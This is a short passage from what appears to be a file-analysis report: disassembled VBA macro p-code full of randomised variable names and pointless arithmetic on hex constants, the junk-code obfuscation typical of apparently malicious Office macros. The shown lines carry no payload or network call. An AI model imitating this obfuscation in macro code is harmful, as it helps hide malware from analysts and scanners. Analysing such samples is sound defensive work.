' IfBlock
' Line #29:
' Ld zZxZQAAC
' Ld mAAAwGo
' Eq
' ElseIfBlock
' Line #30:
' Ld iBQCUGQA
' Ld NDUAUAG
' LitDI4 0xB610 0x38D5
' LitDI4 0x84B7 0x001A
' Add
' ArgsLd Tan 0x0001
' Div
' Coerce (Sng)
' Add
' ArgsLd Hex 0x0001
' St pQko_D
' Line #31:
' Ld bCAQAAA
' Ld dkwUADX
' Eq
' ElseIfBlock
' Line #32:
' LitDI4 0x6B81 0x1839
' ArgsLd Atn 0x0001
' LitDI4 0x5687 0x12CE
' FnInt
' Add
' St TDU_14
' Line #33:
' Ld ZDQXGBxA
' Ld XAQokAk
' Eq
' ElseIfBlock
' Line #34:
' LitDI4 0x66C9 0x1B34
' LitDI4 0x8D48 0x352C
' ArgsLd Atn 0x0001
' Add
' St D1AkAAAQ
' Line #35:
' EndIfBlock
' Line #36:
' EndIfBlock
' Line #37:
' Ld XUQ_AD
' Ld kAxAUA
…
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.